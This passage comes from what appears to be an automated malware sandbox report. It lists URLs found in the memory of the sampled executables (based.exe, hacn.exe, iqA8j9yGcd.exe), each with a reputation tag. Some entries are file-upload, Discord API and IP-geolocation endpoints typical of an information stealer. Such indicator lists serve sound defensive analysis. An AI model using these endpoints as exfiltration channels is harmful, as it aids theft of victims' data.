https://github.com/python/cpython/issues/86361.	based.exe, 00000008.00000003.2084663768.000001F16D03C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2085717037.000001F16D02D000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2112491572.000001F16D03C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2799664583.000001F16D03C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2197734724.000001F16D039000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2083667993.000001F16CDBE000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2178559256.000001F16D03C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2264289292.000001F16D031000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2777793095.000001F16D036000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2153958230.000001F16D03C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2181849798.000001F16D02D000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2152605175.000001F16D03B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2081670732.000001F16D4D0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2796193966.000001F16D03C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2143028640.000001F16D03C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://httpbin.org/	based.exe, 00000008.00000002.2799246935.000001F16CCE4000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s	based.exe, 00000007.00000003.2052974441.0000020693470000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.cl.cam.ac.uk/~mgk25/iso-time.html	based.exe, 00000008.00000003.2081488449.000001F16D296000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2079441469.000001F16D280000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2084832069.000001F16D295000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_module	iqA8j9yGcd.exe, 00000002.00000002.2029846639.0000021B8DEF0000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000008.00000002.2799159126.000001F16CAE0000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000008.00000003.2056853449.000001F16CCE1000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2056896364.000001F16B014000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_caches	iqA8j9yGcd.exe, 00000002.00000002.2029654262.0000021B8DC10000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000008.00000002.2798933070.000001F16C7E0000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000008.00000003.2056853449.000001F16CCE1000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2056896364.000001F16B014000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	based.exe, 00000008.00000003.2129849595.000001F16D309000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2115149912.000001F16D3A7000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2128744563.000001F16D3A7000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2181705680.000001F16E371000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2114865202.000001F16D40B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2176144854.000001F16D3A7000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2181348385.000001F16D30A000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2196755499.000001F16D3A3000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2123061596.000001F16D3A7000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2178286632.000001F16D3A7000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2129617566.000001F16D5D3000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2123172020.000001F16D58F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2162593423.000001F16D3A7000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.youtube.com/	based.exe, 00000008.00000003.2273105012.000001F16D36A000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2204621806.000001F16D368000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2776626857.000001F16D367000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2198781769.000001F16D367000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2269393570.000001F16D367000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2800289913.000001F16D367000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2796381530.000001F16D367000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2802048410.000001F16D930000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://allegro.pl/	based.exe, 00000008.00000002.2802048410.000001F16D930000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535	based.exe, 00000008.00000003.2152605175.000001F16D0D5000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2115149912.000001F16D299000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2799664583.000001F16D0C6000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2264289292.000001F16D0C6000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2777793095.000001F16D0C6000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2799920667.000001F16D299000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2796193966.000001F16D0C6000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy	iqA8j9yGcd.exe, 00000002.00000003.2024750008.0000021B8C458000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000002.00000002.2029611666.0000021B8C461000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000002.00000003.2020773616.0000021B8C45A000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000002.00000003.2025203251.0000021B8C459000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000002.00000003.2028820443.0000021B8C45E000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000002.00000003.2024456134.0000021B8C454000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000002.00000003.2021306448.0000021B8C453000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000002.00000003.2026429540.0000021B8C45B000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000002.00000002.2030262354.0000021B8E0F0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2798756121.000001F16AFA1000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2059110973.000001F16B00E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2056984961.000001F16B018000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2056853449.000001F16CCE1000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2059652717.000001F16AFF9000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2056896364.000001F16B014000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.2057005493.000002471A3F1000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.2062517146.000002471A396000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.2063800528.000002471A397000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.2057088286.000002471A3F1000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000002.2067150043.000002471A397000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.2061298138.000002471A384000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://MD8.mozilla.org/1/m	based.exe, 00000008.00000002.2802048410.000001F16D9C8000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.python.org/psf/license/	based.exe, based.exe, 00000008.00000002.2805857266.00007FF8A8D68000.00000040.00000001.01000000.0000000D.sdmp	false	Avira URL Cloud: safe	unknown
https://www.bbc.co.uk/	based.exe, 00000008.00000002.2802048410.000001F16D930000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://bugzilla.mo	based.exe, 00000008.00000002.2802048410.000001F16D930000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.anonfiles.com/uploadr	based.exe, 00000008.00000003.2077928263.000001F16D066000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2077472570.000001F16D047000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tools.ietf.org/html/rfc6125#section-6.4.3	based.exe, 00000008.00000002.2801877653.000001F16D7E0000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL	based.exe, 00000008.00000003.2129849595.000001F16D309000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2205245063.000001F16D309000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2181705680.000001F16E371000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2181348385.000001F16D30A000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://google.com/mail	based.exe, 00000008.00000002.2801268100.000001F16D4EE000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2123172020.000001F16D565000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2115976918.000001F16D58F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2115976918.000001F16D55E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2801579068.000001F16D5C4000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2272736769.000001F16D5C5000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2798150736.000001F16D5C3000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2801268100.000001F16D569000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2123172020.000001F16D58F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2779737291.000001F16D5C3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py	hacn.exe, 00000009.00000003.2057226169.000002471A3F1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.phys.uu.nl/~vgent/calendar/isocalendar.htm	based.exe, 00000008.00000003.2079441469.000001F16D280000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.google.com/	based.exe, 00000008.00000003.2273105012.000001F16D36A000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2204621806.000001F16D368000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2776626857.000001F16D367000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2198781769.000001F16D367000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2269393570.000001F16D367000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2800289913.000001F16D367000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2796381530.000001F16D367000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2802048410.000001F16D930000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.iqiyi.com/	based.exe, 00000008.00000002.2802048410.000001F16D930000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://foss.heptapod.net/pypy/pypy/-/issues/3539	based.exe, 00000008.00000002.2801663781.000001F16D5E0000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.	based.exe, 00000008.00000002.2801268100.000001F16D490000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2799920667.000001F16D2BF000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2115149912.000001F16D2BF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://google.com/	based.exe, 00000008.00000002.2799454783.000001F16CEE0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.gofile.io/getServerr	based.exe, 00000008.00000003.2077472570.000001F16D047000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.sectigo.com0	based.exe, 00000007.00000003.2052974441.0000020693470000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.python.org/download/releases/2.3/mro/.	iqA8j9yGcd.exe, 00000002.00000003.2020422782.0000021B8E148000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000002.00000003.2020576410.0000021B8E148000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000002.00000003.2020520480.0000021B8E135000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000002.00000003.2020461459.0000021B8E135000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000002.00000002.2029654262.0000021B8DC10000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000008.00000002.2798933070.000001F16C7E0000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000008.00000003.2058606522.000001F16CD45000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000002.2069100436.000002471C4C8000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://discordapp.com/api/v9/users/	based.exe, 00000008.00000002.2799828345.000001F16D0E0000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_source	iqA8j9yGcd.exe, 00000002.00000002.2029654262.0000021B8DC10000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000008.00000002.2798933070.000001F16C7E0000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000008.00000003.2056853449.000001F16CCE1000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2056896364.000001F16B014000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ip-api.com/json/?fields=225545r	based.exe, 00000008.00000003.2077928263.000001F16D066000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2077472570.000001F16D047000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_spec	iqA8j9yGcd.exe, 00000002.00000002.2029846639.0000021B8DEF0000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000008.00000002.2799159126.000001F16CAE0000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000008.00000003.2056853449.000001F16CCE1000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2056896364.000001F16B014000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/urllib3/urllib3/issues/2920	based.exe, 00000008.00000002.2801877653.000001F16D7E0000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#	based.exe, 00000007.00000003.2052974441.0000020693470000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_data	iqA8j9yGcd.exe, 00000002.00000003.2024750008.0000021B8C458000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000002.00000002.2029635146.0000021B8C46D000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000002.00000003.2028367878.0000021B8C46C000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000002.00000003.2020773616.0000021B8C45A000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000002.00000003.2025203251.0000021B8C459000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000002.00000003.2024456134.0000021B8C454000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000002.00000003.2021306448.0000021B8C453000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000002.00000003.2026429540.0000021B8C45B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2798756121.000001F16AFA1000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2059110973.000001F16B00E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2056984961.000001F16B018000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2056853449.000001F16CCE1000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2059652717.000001F16AFF9000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2056896364.000001F16B014000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://yahoo.com/	based.exe, 00000008.00000002.2801268100.000001F16D4EE000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2123172020.000001F16D565000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2115976918.000001F16D58F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2115976918.000001F16D55E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2801579068.000001F16D5C4000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2272736769.000001F16D5C5000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2798150736.000001F16D5C3000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2801268100.000001F16D569000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2123172020.000001F16D58F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2779737291.000001F16D5C3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://account.bellmedia.c	based.exe, 00000008.00000002.2802048410.000001F16D9CC000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6	based.exe, 00000008.00000003.2115149912.000001F16D299000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2799920667.000001F16D299000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://cacerts.digicert.co	iqA8j9yGcd.exe, 00000000.00000003.2014721860.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.2039194713.00000246D4004000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000007.00000003.2054109370.0000020693470000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.thawte.com/ThawteTimestampingCA.crl0	based.exe, 00000007.00000003.2052974441.0000020693470000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://html.spec.whatwg.org/multipage/	based.exe, 00000008.00000003.2112491572.000001F16D03C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2799664583.000001F16D03C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2197734724.000001F16D039000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2178559256.000001F16D03C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2264289292.000001F16D031000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2777793095.000001F16D036000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2153958230.000001F16D03C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2181849798.000001F16D02D000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2152605175.000001F16D03B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2796193966.000001F16D03C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2143028640.000001F16D03C000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.ifeng.com/	based.exe, 00000008.00000002.2802048410.000001F16D930000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings	based.exe, 00000008.00000002.2801877653.000001F16D7E0000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.zhihu.com/	based.exe, 00000008.00000002.2802048410.000001F16D968000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.rfc-editor.org/rfc/rfc8259#section-8.1	based.exe, 00000008.00000002.2801268100.000001F16D490000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2799920667.000001F16D2BF000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2115149912.000001F16D2CF000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2115149912.000001F16D2BF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.microsoftCONSM~1JSOy.	based.exe, 00000008.00000002.2801579068.000001F16D5C4000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2798150736.000001F16D5C3000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2779737291.000001F16D5C3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.iana.org/time-zones/repository/tz-link.html	based.exe, 00000008.00000003.2079657457.000001F16D014000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2079441469.000001F16D280000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.microsoftENCRYP~1JSOy.	based.exe, 00000008.00000003.2115976918.000001F16D58F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2123172020.000001F16D58F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.gofile.io/getServer	based.exe, 00000008.00000002.2799828345.000001F16D0E0000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://cacerts.digiH	based.exe, 00000007.00000003.2050911110.0000020693470000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://sectigo.com/CPS0	based.exe, 00000007.00000003.2052974441.0000020693470000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.amazon.co.uk/	based.exe, 00000008.00000002.2802048410.000001F16D930000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.thawte.com0	based.exe, 00000007.00000003.2052974441.0000020693470000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://json.org	based.exe, 00000008.00000003.2143028640.000001F16D03C000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.python.org/dev/peps/pep-0205/	hacn.exe, 00000006.00000003.2039819790.00000246D4005000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.wykop.pl/	based.exe, 00000008.00000002.2801754901.000001F16D7BC000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.is_package	iqA8j9yGcd.exe, 00000002.00000002.2029654262.0000021B8DC98000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000008.00000002.2798933070.000001F16C868000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000008.00000003.2056853449.000001F16CCE1000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2056896364.000001F16B014000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://twitter.com/	based.exe, 00000008.00000002.2801268100.000001F16D490000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2273105012.000001F16D36A000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2204621806.000001F16D368000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2776626857.000001F16D367000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2799246935.000001F16CCE4000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2198781769.000001F16D367000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2269393570.000001F16D367000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2800289913.000001F16D367000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2796381530.000001F16D367000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2802048410.000001F16D930000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.olx.pl/	based.exe, 00000008.00000002.2802048410.000001F16D968000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000008.00000002.2802048410.000001F16D930000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.mozilla.org/products/firefox	based.exe, 00000008.00000003.2776626857.000001F16D3A7000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2115149912.000001F16D3A7000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2262634216.000001F16D39F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2797041633.000001F16D39B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2152336872.000001F16D40D000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2128744563.000001F16D3A7000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2796381530.000001F16D38B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2800463208.000001F16D3A3000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2114865202.000001F16D40B000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2176144854.000001F16D3A7000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2123018744.000001F16D40D000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2196755499.000001F16D3A3000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2123061596.000001F16D3A7000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2178286632.000001F16D3A7000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2162593423.000001F16D3A7000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://cacerts.digicert.coH	based.exe, 00000007.00000003.2054109370.0000020693470000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.create_module	iqA8j9yGcd.exe, 00000002.00000002.2029654262.0000021B8DC98000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000008.00000002.2798933070.000001F16C868000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000008.00000003.2056853449.000001F16CCE1000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2056896364.000001F16B014000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://google.com/	based.exe, 00000008.00000002.2801268100.000001F16D4EE000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2801268100.000001F16D490000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2123172020.000001F16D565000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2115976918.000001F16D58F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2115976918.000001F16D55E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2801579068.000001F16D5C4000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2272736769.000001F16D5C5000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2798150736.000001F16D5C3000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2801268100.000001F16D569000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2799246935.000001F16CCE4000.00000004.00000020.00020000.00000000.sdmp, based.exe, 